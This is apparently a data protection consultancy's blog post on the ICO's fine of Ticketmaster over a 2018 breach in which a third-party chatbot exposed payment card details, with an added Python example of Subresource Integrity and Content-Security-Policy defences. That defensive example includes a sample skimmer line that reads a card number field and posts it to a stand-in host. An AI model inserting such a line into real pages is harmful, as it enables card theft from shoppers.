The ICO has fined Ticketmaster £1.25 million over a data breach that happened in 2018. The cyberattack affected the payment information of more than nine million customers in the UK and Europe.
How the breach happened
A vulnerability in a third-party chatbot embedded on Ticketmaster's payment page allowed attackers to capture what customers typed into that page. As a result, customers' payment details (card numbers, expiry dates and CVV numbers) were exposed.
James Dipple-Johnstone, Deputy Commissioner at the ICO said:
Ticketmaster should have done more to reduce the risk of a cyber-attack. Its failure to do so meant that millions of people in the UK and Europe were exposed to potential fraud.
According to the ICO, Ticketmaster failed to do the following:
- Assess the risks of placing a third-party chatbot on its payment page.
- Identify and implement the appropriate security measures to counter the risks.
- Identify the source of fraudulent activity in time.
Despite warnings from several financial institutions, including Monzo, Barclays and AmEx, it took nine weeks for Ticketmaster to start monitoring its payment page for suspicious activity. Following the breach, 60,000 Barclays customers were victims of fraud and Monzo had to replace 6,000 payment cards over suspected fraudulent use.
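The ICO's second finding, that appropriate measures to counter the risk of a third-party chatbot on a payment page were not identified and implemented, is the one a security engineer can act on directly. The example below is added here and is not code from the article, from Ticketmaster or from the chatbot vendor. It assumes the chatbot was delivered as a third-party `<script>` tag on the checkout page (the article does not say how it was embedded), and it shows two standard browser controls for exactly that situation: Subresource Integrity, which makes the browser refuse a third-party script whose contents differ from the copy the operator reviewed, and a Content-Security-Policy `connect-src` directive, which limits where the page is allowed to send data even if a script does get modified. The script bodies and hostnames are constructed for the example and are hypothetical.

```python
import base64
import hashlib
import hmac

# Constructed sample of a third-party widget loader as reviewed and approved
# by the site operator. Hypothetical; not the chatbot from the Ticketmaster case.
PINNED_SCRIPT = b"window.chatWidget = { init: function () { /* render chat panel */ } };\n"

# Constructed sample of the same file after an unauthorised change on the
# vendor side: one appended line reads the card number field and posts it to
# a host the operator never approved. Hypothetical hostnames throughout.
TAMPERED_SCRIPT = PINNED_SCRIPT + (
    b"fetch('https://collect.example.net/x', {method: 'POST', "
    b"body: document.getElementById('cardNumber').value});\n"
)

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_integrity(script: bytes, algo: str = "sha384") -> str:
    """Build the value for a <script integrity="..."> attribute.

    Browsers expect '<algo>-<base64 digest>'. sha384 is the usual choice;
    sha256 and sha512 are the other two algorithms the SRI spec allows.
    """
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI only permits sha256, sha384 or sha512")
    digest = hashlib.new(algo, script).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(script: bytes, integrity: str) -> bool:
    """Replicate the browser's check: a script whose digest does not match
    the pinned integrity value must not execute. A malformed or unsupported
    integrity string is treated as a failure (fail closed)."""
    algo, _, _ = integrity.partition("-")
    try:
        expected = sri_integrity(script, algo)
    except ValueError:
        return False
    return hmac.compare_digest(expected.encode("ascii"), integrity.encode("utf-8"))


def script_tag(src: str, script: bytes) -> str:
    """Emit the pinned <script> tag. crossorigin="anonymous" is required for
    cross-origin SRI so the browser may read the response body and hash it."""
    return (f'<script src="{src}" integrity="{sri_integrity(script)}" '
            f'crossorigin="anonymous"></script>')


def payment_page_csp(script_hosts, connect_hosts) -> str:
    """Content-Security-Policy header for a checkout page.

    script-src lists the only origins allowed to supply JavaScript;
    connect-src lists the only origins the page may send requests to, which
    is what stops a skimmer from exfiltrating card data even if it runs.
    """
    return "; ".join([
        "default-src 'self'",
        "script-src 'self' " + " ".join(script_hosts),
        "connect-src 'self' " + " ".join(connect_hosts),
        "form-action 'self'",
        "frame-ancestors 'none'",
    ])


if __name__ == "__main__":
    pinned = sri_integrity(PINNED_SCRIPT)
    print(script_tag("https://chat.vendor.example/widget.js", PINNED_SCRIPT))
    print("approved copy passes:", sri_matches(PINNED_SCRIPT, pinned))
    print("tampered copy passes:", sri_matches(TAMPERED_SCRIPT, pinned))
    print(payment_page_csp(["https://chat.vendor.example"],
                           ["https://chat.vendor.example",
                            "https://api.payments.example"]))
```

The tampered copy fails the SRI check, so the browser never runs it; and because `collect.example.net` is not in `connect-src`, the appended `fetch` would be blocked even on a page without SRI. The caveat to raise during vendor assessment is that SRI only works when the vendor serves a fixed, versioned file: a chatbot that updates its script in place will simply stop loading once pinned, and a vendor that cannot offer versioned releases is telling you something about the risk of putting its code next to a card form.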
With cyberattacks on the rise, third-party vendors are an easy route for attackers into your organisation's data. Research shows that over 59% of data breaches involve a third-party vendor. Vendors that provide email, cloud or payment services are particularly exposed.
As a business, it is your responsibility to take steps to minimise those risks. You must vet third-party vendors and assess their cyber-security risk at the start of the relationship, including what access their software has to the pages and data your customers use. If you did not do this at the outset, it is not too late. We recommend continuously monitoring the cyber-security risks of your third-party vendors so that you are not caught by surprise. To conduct a comprehensive audit, get in touch with us for our bespoke and award-winning data protection consultancy service.
If you have been affected by a data breach, read our article on the 7 things you must do straight away to protect your personal information.
The ICO issued a warning to other organisations in its statement:
The £1.25m fine we’ve issued today will send a message to other organisations that looking after their customers’ personal details safely should be at the top of their agenda.
Kazient Privacy Experts offers bespoke Data Protection, Privacy and GDPR compliance solutions in a language you understand to UK and international organisations, and has received positive media coverage across Europe. Kazient's GDPR consultants are fully certified to act as your outsourced Data Protection Officer or EU Representative. Get in touch to find out how we can help your business by visiting our website www.kazient.co.uk or calling us on 0330 022 9009.